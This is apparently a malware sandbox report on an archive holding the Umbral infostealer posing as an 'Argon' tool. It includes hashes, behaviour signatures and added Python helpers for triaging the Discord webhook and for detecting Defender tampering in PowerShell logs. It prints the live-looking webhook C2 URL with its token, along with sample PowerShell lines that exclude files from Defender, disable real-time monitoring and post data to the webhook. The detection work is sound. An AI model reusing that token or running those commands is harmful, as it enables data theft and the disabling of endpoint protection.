General

  • Target

    Pass 8864.zip

  • Size

    4.7MB

  • Sample

    241226-wf87fstjcz

  • MD5

    0178e791918b66c56ac8359005ebb979

  • SHA1

    bcc3b8045526f713e8ccefaa1050ab8fdaf53a45

  • SHA256

    2592ac7a76bc435a210d3646794abf0a654937d0ce6553ebc14982480a169433

  • SHA512

    1dd950696d69a59fc944d8a809390dc352a13338e0e5cf81e1e274b0e04c6858cb877cb4da2c358329e017f9e2b33981611e806075cb3e1f8e3149b47a6d1bde

  • SSDEEP

    98304:RlBiFzdYGiwC+zNIfwvilltOrnmeZ0ARLuq6ZIfPHUXeH4gdkYlfnCeK60Usv:RI/ir2vr6CuF1X2Rdk4hKI4

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1320456077468368906/F7rw766V_H8a2Z__0yhCNo12vx-Ia2NeCg2Ds_H44T5Cf5iiyVYLb09YSN1sfOYJwp1p
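
The extracted C2 is not a server the attacker owns but a Discord webhook, so the useful triage steps are different from a classic IP/domain indicator: the URL carries both the webhook ID and its token, the ID is a Discord snowflake whose upper bits encode when the webhook was created, and the path segment is the only thing a proxy log will ever show. The following Python is an added example (not part of the tria.ge report or of the Umbral project) that pulls those facts out of the config above. It assumes only Discord's documented webhook URL shape and snowflake epoch (2015-01-01 UTC, in milliseconds); SAMPLE_C2 is the URL from the config above, reused as the input.

```python
"""Triage helper for the Discord-webhook C2 in the extracted Umbral config (added example)."""
import re
from datetime import datetime, timezone

# Discord snowflake IDs carry a millisecond timestamp in their upper 42 bits,
# counted from 2015-01-01T00:00:00Z (Discord's documented epoch).
DISCORD_EPOCH_MS = 1_420_070_400_000

# Documented webhook URL shape: /api/webhooks/<id>/<token>, also on ptb/canary hosts.
WEBHOOK_RE = re.compile(
    r"^https://(?:(?:ptb|canary)\.)?discord(?:app)?\.com/api/webhooks/"
    r"(?P<id>\d{17,20})/(?P<token>[A-Za-z0-9_-]+)$"
)

# The C2 URL as extracted by the sandbox (taken from the config above).
SAMPLE_C2 = (
    "https://discord.com/api/webhooks/1320456077468368906/"
    "F7rw766V_H8a2Z__0yhCNo12vx-Ia2NeCg2Ds_H44T5Cf5iiyVYLb09YSN1sfOYJwp1p"
)


def parse_webhook(url):
    """Return {'id': int, 'token': str} for a Discord webhook URL, else None."""
    m = WEBHOOK_RE.match(url.strip())
    if not m:
        return None
    return {"id": int(m.group("id")), "token": m.group("token")}


def snowflake_ms(snowflake):
    """Unix time in milliseconds at which Discord minted this ID."""
    return (snowflake >> 22) + DISCORD_EPOCH_MS


def snowflake_to_datetime(snowflake):
    return datetime.fromtimestamp(snowflake_ms(snowflake) / 1000, tz=timezone.utc)


def defang(url):
    """hxxps://discord[.]com/... form, safe to paste into a ticket without a live link."""
    scheme, rest = url.split("://", 1)
    host, _, path = rest.partition("/")
    return f"{scheme.replace('http', 'hxxp')}://{host.replace('.', '[.]')}/{path}"


def triage(url):
    """Everything an analyst wants from the webhook URL, or None if it is not one."""
    info = parse_webhook(url)
    if info is None:
        return None
    created = snowflake_to_datetime(info["id"])
    return {
        "webhook_id": info["id"],
        "created_utc": created.isoformat(timespec="seconds"),
        "defanged": defang(url),
        # Hunt key for proxy/TLS-inspection logs: the ID-bearing path is unique to
        # this webhook, whereas the host alone is shared with all legitimate Discord use.
        "hunt_path": f"/api/webhooks/{info['id']}/",
    }


if __name__ == "__main__":
    print(triage(SAMPLE_C2))
```

Two points follow from the output. The creation time of this webhook falls on 2024-12-22, a few days before the sample was submitted (the 241226 prefix of the sample ID), which is typical of a freshly provisioned exfiltration channel rather than shared infrastructure; and blocking discord.com outright is rarely acceptable, so the hunt should be on the exact `/api/webhooks/<id>/` path. Treat the full URL as a credential: the token is all that is needed to post to, read, or (per Discord's API documentation, with an unauthenticated DELETE to the same URL) delete the webhook.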

Targets

    • Target

      Pass 8864/Argon/Argon.exe

    • Size

      229KB

    • MD5

      0141daae60d7dd08a86fc4789cfb3689

    • SHA1

      791d4a8f158313d355fad6dafa158407e80581bf

    • SHA256

      d22b7b3b76496cda8bcad31dce4b2b3ab5ed3b91926d744982e492e5b39cf296

    • SHA512

      74255f2cbb6345b4aefd7822587ca9503da2e49d41bb4306eca4e6ef96293b0f1c7e3173c8eb27aac54c1b0abebb8306d0e1d4b9aa824b153a8cd563a6640f9c

    • SSDEEP

      6144:FloZM0rIkd8g+EtXHkv/iD4+2S86YXzQUp8aLLyuOb8e1msi8i:HoZDL+EP8+2S86YXzQUp8aLLylA

    • Detect Umbral payload

    • Umbral

      Umbral stealer is an open-source modular stealer written in C#.

    • Umbral family

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials and other secrets.

    • Legitimate hosting services abused for malware hosting/C2

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Target

      Pass 8864/Argon/Microsoft.Web.WebView2.Core.dll

    • Size

      589KB

    • MD5

      a53ba26a25f78f512cb2f393f9c96463

    • SHA1

      4176d5607859817a0b44a253c34f7edb3a46f21e

    • SHA256

      88a3b62f45225a811cdb85df6dfd95c2bff9a0e43e3b04f813b125eaca56cc9f

    • SHA512

      df1cd812fce4a46cae7f4d59256a12732367d16981b01f1067d58966d6612ae102eaa274fc3c9ac21aeb0422cf09ac1232fbe2b74d1daf6c76489f6e8de16751

    • SSDEEP

      12288:WrCyR/rpQ322fy+uFKcDmuRFNEMzeu+imQ269pRFZNIEJdIEY0lxEIPrEIgcvLc6:Va7

    Score
    1/10
    • Target

      Pass 8864/Argon/Microsoft.Web.WebView2.WinForms.dll

    • Size

      37KB

    • MD5

      92acec9aed00f134ba86a0f7c496f26c

    • SHA1

      3cd10e0afdd7955716a83d5f5d59859c6f7c7353

    • SHA256

      29fc954c3fde1749817d158f3dd5ebe9efd3b3ce9708d86092fb1e9f023a1cb0

    • SHA512

      4e11772afa9282c2f5f2565b0e908102fc8d0a08c40ca57587c338698e9ab747ff5a1673d32b6cd09d7b22b0e6c2836f1324ec8257e5223754595160a4c28ad2

    • SSDEEP

      768:umgRNRbnIfWuJCRfXBkrQYZDgcEST3p4Jjrjh2jeFSUyauTv1JKia5/Zi/WG4KgL:XQR20BUQYZDgcEST3p4JjrjaeFSUyauO

    Score
    1/10
    • Target

      Pass 8864/Argon/Microsoft.Web.WebView2.Wpf.dll

    • Size

      81KB

    • MD5

      b98c511e0f75434a66d9bf0efd1795db

    • SHA1

      515c6c1627775ce5149b410f4b19a2f25b41b2a8

    • SHA256

      1c5b6c792916d168093ef9b836f33e818d2d15d0c81f0864b5cddff97d913319

    • SHA512

      73fc64485db816be0bf135c7740ee916836c3bf03caabb85a1be7c5b3a4862cc1caa4975944cfd670f1cc2d90ae7c305cbea3dd9f27633244c51e5efcbaed2cd

    • SSDEEP

      1536:jmJUzMJcumSzTIudfRz+Ohsha87Y1DHfFWyEb30mpc4Jjr4YeUqRHhwU0fdwzvUe:YUzMJNzTIudB+Oh0a8+DHfFC30mpc4JY

    Score
    1/10
    • Target

      Pass 8864/Argon/Newtonsoft.Json.dll

    • Size

      695KB

    • MD5

      195ffb7167db3219b217c4fd439eedd6

    • SHA1

      1e76e6099570ede620b76ed47cf8d03a936d49f8

    • SHA256

      e1e27af7b07eeedf5ce71a9255f0422816a6fc5849a483c6714e1b472044fa9d

    • SHA512

      56eb7f070929b239642dab729537dde2c2287bdb852ad9e80b5358c74b14bc2b2dded910d0e3b6304ea27eb587e5f19db0a92e1cbae6a70fb20b4ef05057e4ac

    • SSDEEP

      12288:GBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUO:GBjk38WuBcAbwoA/BkjSHXP36RMG/

    Score
    1/10
    • Target

      Pass 8864/Argon/bin/Atlantis.dll

    • Size

      6.0MB

    • MD5

      cbf096a7133c07f1a19efde61c1aca13

    • SHA1

      55e3f5a470101a291f992a24d2e370ba15b039ca

    • SHA256

      00243e13c5a23ceaa06618d2770a320038bd24a69d0252dcca09e74b5d6a0013

    • SHA512

      d9f5d9a34e86502fee87df15b13069284cf5fc7375e9d3c73011ee290e5dbfec0b137e93593f1b4227c0707df6255a4e2bc569325289735137eb07183abc58b3

    • SSDEEP

      98304:8j+/n7qBMK1BhXDn3nmDDyJa84v2aZoEmcLo3:aon1K1BhXDn3mDDyJa84v2aZtJLa

    Score
    1/10
    • Target

      Pass 8864/Argon/bin/oRniz4vtL94l.exe

    • Size

      4.1MB

    • MD5

      cd2cf251993d02bba6c82ceef9771dd8

    • SHA1

      e9695d027a4babf1a3d5c2b900d69d1213dd160e

    • SHA256

      8241f49cd516cc727a9f24a56c9fcca5d14fab162d00a17514e662238043178a

    • SHA512

      b5ffaf85f09451bef239ba7fd11361368e0750b9c9aa6b29f6450acd3a079ccb9f5a5045c0115268f731c4e82888867925f67c466626cd84d5a350b7ee3e7687

    • SSDEEP

      49152:rvVwASOvGtlqkbXPySBQnGkKX2M1m/RbtcJrzVX68TsgdVMuQni+e3d5RPPezNdx:KfySBQnGkKX2/pafVXIgml6tqq+b1

    Score
    1/10
    • Target

      Pass 8864/Argon/fix exploit.bat

    • Size

      1KB

    • MD5

      5289fa561dcb8647582896af6528671a

    • SHA1

      fda5871c543e9986194aa7c027aad8206d9bbe4a

    • SHA256

      762048396be01b02e2fb949f4276179732da23799cfb715600e333d7597475bc

    • SHA512

      f8e90026dce457483ef7a5f5341bfb54a16432457e1139b5d8f4a6d18374e05668e7e4f1248dba0ed23ce036261803094b295493eac03fcb56859d5c3fe7b679

    Score
    1/10
    • Target

      Pass 8864/Argon/message.bat

    • Size

      356B

    • MD5

      c76645f1baab3397fc8ea7200d3bb908

    • SHA1

      1a5b47e2ba0cbe028cf20d5d949db616c9b18788

    • SHA256

      17165f9adf2601664b8f6fdbf87749f46fe53c1eccdb9a1e2fad4f46ab8dd967

    • SHA512

      1c422db62279267536fbd615f90bd2648f238599e1a7063834de23e11c7219cf176df0be671cfb7f08a9d7f52a387fb936ae3e2e85446156284fdce422300c7f

    Score
    1/10
    • Target

      Pass 8864/Argon/runtimes/win-x64/native/WebView2Loader.dll

    • Size

      162KB

    • MD5

      c9a5d0f278d57d83a03404b8baeeac64

    • SHA1

      39d44b999c1d89c36136804a373d4d427bc7d679

    • SHA256

      462b36fd1be6ca9f7563466a89e57c41ef4a4def3e0a84fa885d203aea4a3aaf

    • SHA512

      97dfb08eae34624b7679a4bb07dee242b2a38324dc13b8aaec6de7f6fed477e9f9bc7474d4df9fbe907d1a460723db7177b7128a26edf5bd73d38d4d45722db6

    • SSDEEP

      3072:fXAne8TlTRTSpL1ThTNTRyMDjRb/hy75HGRtVBviiZsZ5AalCPTxiEtJx9eg8Xjm:/yTlTRTUL1ThTNTRyeLq1GRtVBvPZsrw

    Score
    1/10
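
Of the behaviours flagged on Argon.exe above, the PowerShell Defender-exclusion step is the one most worth detecting on real endpoints, because it precedes the actual theft and is rarely legitimate outside software deployment. The following Python is an added example (not part of the tria.ge report or of the Umbral project) of that detection run over PowerShell script block logging, which on Windows is event 4104 in the Microsoft-Windows-PowerShell/Operational log and carries the executed text in ScriptBlockText. It also tags the webhook C2 pattern from the config section. The event records in SAMPLE_EVENTS are constructed for this example and are not from the sandbox run; the exclusion values in them are invented.

```python
"""Script-block-log detection for the Defender exclusion behaviour flagged above (added example)."""
import re

# Patterns for the behaviours the sandbox signatures describe. Case-insensitive,
# since PowerShell cmdlet and parameter names are. Dict order fixes tag order.
RULES = {
    # Add-MpPreference with any of the three exclusion kinds the signature names.
    "defender_exclusion": re.compile(
        r"\bAdd-MpPreference\b[^\n;|]*?-Exclusion(?:Path|Extension|Process)\b", re.I),
    # Set-MpPreference -Disable<Feature> $true (e.g. real-time monitoring).
    "defender_disable": re.compile(
        r"\bSet-MpPreference\b[^\n;|]*?-Disable\w+\s+\$?true\b", re.I),
    # Discord webhook used as C2/exfil endpoint (host is shared with legitimate use;
    # the ID-bearing path is what makes this an indicator).
    "discord_webhook": re.compile(
        r"https?://(?:\w+\.)?discord(?:app)?\.com/api/webhooks/\d+/", re.I),
}

# Pulls the value of each -Exclusion* parameter: double-quoted, single-quoted or bare token.
EXCLUSION_ARG = re.compile(
    r"-Exclusion(Path|Extension|Process)\s+(?:\"([^\"]*)\"|'([^']*)'|(\S+))", re.I)


def classify(script_block):
    """Names of the RULES that match this script block text, in RULES order."""
    return [name for name, rx in RULES.items() if rx.search(script_block)]


def exclusions(script_block):
    """List of (kind, value) pairs for every Defender exclusion the text adds."""
    out = []
    for m in EXCLUSION_ARG.finditer(script_block):
        kind = m.group(1).lower()
        raw = m.group(2) or m.group(3) or m.group(4) or ""
        # PowerShell accepts comma-separated lists for these parameters.
        for value in raw.split(","):
            value = value.strip().strip("\"'")
            if value:
                out.append((kind, value))
    return out


def scan_events(events):
    """Run the rules over 4104 events (dicts with EventID and ScriptBlockText)."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        text = ev.get("ScriptBlockText", "")
        tags = classify(text)
        if tags:
            alerts.append({"tags": tags, "exclusions": exclusions(text), "text": text})
    return alerts


# Constructed sample events (not from the sandbox run); paths and names are invented.
SAMPLE_EVENTS = [
    {"EventID": 4104, "ScriptBlockText": "Get-Process | Where-Object { $_.CPU -gt 100 }"},
    {"EventID": 4104, "ScriptBlockText":
        r'Add-MpPreference -ExclusionPath "C:\Users\Public\Argon" -ExclusionExtension .exe,.bat'},
    {"EventID": 4104, "ScriptBlockText":
        "Add-MpPreference -ExclusionProcess 'Argon.exe'; "
        "Set-MpPreference -DisableRealtimeMonitoring $true"},
    # Wrong event ID: module logging rather than script block logging, so skipped.
    {"EventID": 4103, "ScriptBlockText": r"Add-MpPreference -ExclusionPath C:\tmp"},
    {"EventID": 4104, "ScriptBlockText":
        "Invoke-RestMethod -Uri https://discord.com/api/webhooks/1320456077468368906/REDACTED "
        "-Method Post -Body $payload"},
]


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert["tags"], alert["exclusions"])
```

Script block logging only sees what PowerShell ran, so pair this with the Defender side: event 5007 in the Microsoft-Windows-Windows Defender/Operational log records every configuration change, and on a suspect host `Get-MpPreference | Select-Object ExclusionPath, ExclusionExtension, ExclusionProcess` lists what is currently excluded. An exclusion for the stealer's own process name or drop directory, as the signature describes, is a strong signal even when the script text itself was obfuscated.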

MITRE ATT&CK Enterprise v15

Tasks